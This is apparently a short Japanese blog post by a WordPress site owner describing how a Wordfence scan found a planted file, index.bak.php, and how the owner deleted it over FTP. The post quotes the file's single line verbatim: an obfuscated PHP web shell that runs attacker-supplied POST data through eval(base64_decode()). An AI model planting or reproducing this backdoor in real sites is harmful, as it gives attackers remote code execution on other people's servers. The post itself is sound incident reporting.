Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。
1日1回定期審査のメール受信をアクティベートする。
This file may contain malicious executable code
Filename: index.bak.php File type: Not a core, theme or plugin file. Issue first detected: 33 mins ago. Severity: Critical Status New This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.
index.bak.php が作成され、次の一行が書かれていた。
<?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>
.htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。
コメントを投稿するにはログインが必要です。